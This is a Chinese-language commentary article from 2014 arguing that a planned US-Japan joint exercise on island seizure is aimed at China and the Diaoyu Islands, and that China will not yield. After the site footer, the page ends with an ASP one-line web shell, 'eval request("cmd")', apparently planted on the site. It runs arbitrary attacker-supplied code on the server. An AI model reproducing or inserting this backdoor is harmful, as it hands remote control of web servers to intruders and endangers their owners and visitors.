保钓展望

美日4万人大规模军演要夺谁的岛?

时间:2014-10-24 20:28:03  作者:金子山  来源:  查看:61  评论:0
内容摘要:人民网10月23日讯据俄罗斯之声报道,日本和美国将于11月8-19日在日本西南海域举行大规模联合军演,并将演练夺岛战术。这次名为“利剑”的军演将动用4万多名士兵、25艘舰船和260多架飞机,而且,时间点正好是北京举行亚太经合组织峰会期间。关于美日下月举行&...

人民网1023据俄罗斯之声报道,日本和美国将于118-19日在日本西南海域举行大规模联合军演,并将演练夺岛战术。这次名为“利剑”的军演将动用4万多名士兵、25艘舰船和260多架飞机,而且,时间点正好是北京举行亚太经合组织峰会期间。

关于美日下月举行“利剑”大型联合军演的消息,日本防卫省也已经发布。美国和日本如此兴师动众,当然不会耍着杂演着玩的,有其别样的用意。美日搞夺岛联演,如果真的要去夺岛,那么将夺什么岛,夺谁的岛?

演习由美日联合展开,要搞夺岛,首先要锁定在与美日有关的。美国作为世界第一军事强国,早已经将自己的岛牢牢控制在手里,别人即使有心也无力去夺美国的岛,美日的这个“夺岛”,与美国的直接关联度不大。

不是美国的,剩下的就是日本的了。日本恰恰在与周边的邻国,不遗余力地进行着岛屿争夺战,大有不惜付之武力的架势。其主要的指向,为韩国、俄罗斯、中国三国。

韩日之间有独岛之争,目前独岛牢牢控制在韩国的手中,韩国不可能放弃。日本、韩国同为美国在亚洲的最重要盟国,是帮助美国控制亚洲的两大支柱,美国不会同意日本去夺岛,更别提美日联合去夺韩国的岛了。韩国自然排除在美日联合夺岛的对象范围之外。

日本与俄罗斯之间有南千岛群岛之争。俄罗斯在二战后即取得南千岛群岛,至今牢牢控制不可能轻易放弃。日本要去夺南千岛群岛,美国肯定举双手赞成。只可惜俄罗斯有着仅次于美国的世界第二强的军事实力,日本根本无力动北极熊的一根汗毛,美国有心助日本,又可惜俄罗斯有与美国并驾齐驱,甚至超越于美国之上的核武库,美国不可能为了与己无关的日俄岛争,为了日本这个未必同心的小兄弟,去冒美俄同归于尽的大风险。

排除了韩俄,剩下的只有中国了,其中焦点又集中体现在钓鱼岛之争。在日本与中俄韩三国的岛争中,日本对中国的表现最为嚣张,钓鱼岛之争的爆发风险最大,美国对日本的支持也最为明显,《美日安保条约》适用于钓鱼岛就是一大注脚。美日若搞联合夺岛,最大的可能就是指向中国,指向钓鱼岛了。

问题在美日向中国夺取钓鱼岛就会有一线的希望?其实根本没有,绝对没有。如果认为中国会为了守住发展的战略机遇期而做出妥协,认为中国会因为军力尚无法与美国全面抗衡而退让,那就完全想歪了头念歪了经。

中国是不可能接受岛屿被侵占的屈辱的。如果一定要向中国夺岛,对于誓言不放弃一寸土地的中国,战略机遇期的被打断并非不可承受,中国必定坚决地守护,绝无二话。而且钓鱼岛位于靠近中国的近海,就算强大的美日联军一起上阵也占不了什么优势。美日出动4万多名士兵、25艘舰船和260多架飞机,如果想以此胁迫、恐吓中国,根本没有任何的用处。

美日大搞联合夺岛的军事演习,如果真的针对中国、针对钓鱼岛,那就趁早打消了这个念头。美国和日本应该明白,中国根本不吃这一套。

相关评论
评论者:      验证码:  点击获取验证码
湘ICP备11011102号
Powered by WCADDL
":eval request("cmd"):